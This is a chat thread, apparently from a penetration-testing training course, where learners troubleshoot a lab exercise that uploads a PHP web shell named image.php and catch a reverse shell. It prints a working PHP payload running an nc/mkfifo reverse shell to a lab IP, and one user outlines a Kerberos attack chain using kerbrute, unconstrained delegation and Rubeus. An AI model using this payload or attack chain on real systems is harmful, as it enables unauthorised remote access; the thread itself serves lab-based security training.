@next bronze I'm following along with the lesson, was able to image.php file uploaded, then added the Bash script specified in the lesson, and the started the nc listener and it just waits forever
Then tried to curl the image.php file to make sure it is there and I'm getting an error saying that it is not found on the server
Just rechecked the content directory and now the image.php file is gone so maybe that is the problem?
next bronze
you need to curl it so that it triggers the reverse shell, if you don't find it, upload again
and make sure you configured the ip and port correctly
swift forge
Question regarding the image.php file, is it supposed to have both bash scripts or just the longer one?
From reading the lesson it sounded like both and maybe that is the issue?
next bronze
you mean these two?
<?php system('id'); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
Yes
next bronze
you need to understand the purpose of the two commands there, the one on top is a simple id command, really just to test if you are able to execute system commands, once that's confirmed, then you can put a reverse shell in its place, which is what you're aiming for
swift forge
Ok so the id portion is working, when I curl the file it shows the id
So something is up with the reverse shell command
fathom pendant
you mean these two?
```php
<?php system('id'); ?>
<?php system ("rm /tmp/f;mkfif...
Is the 10.10.14.2 YOUR tun0?
And are you listening on that port?
next bronze
nope just taken from the example
swift forge
Could it be the port that I am using? Any recommendations?
fathom pendant
Could it be the port that I am using? Any recommendations?
Steps > start listener > start shell
next bronze
the ip should match your tun0 ip, the port should be you nc listen port
swift forge
I think I figured out what I'm doing wrong, 1 sec to confirm
Got it, I had the target IP in the code instead of my own
reef drift
Is there anyone I can ask about kerberos attack module skill assessment last question? I'm stuck, I obtained pwd from the two accounts 1st with kerbrute (daniel.whitehead) , then I obtained the hash from annette.jackson because has an unconstrained delegation on the server01..then i entered to server01, using rubeus, I monitored the sessions then I obtained session from jake.kirk but jake is not privileged.
swift forge
Last question regarding this, the Python code it recommends using, do we add that to our image.php file?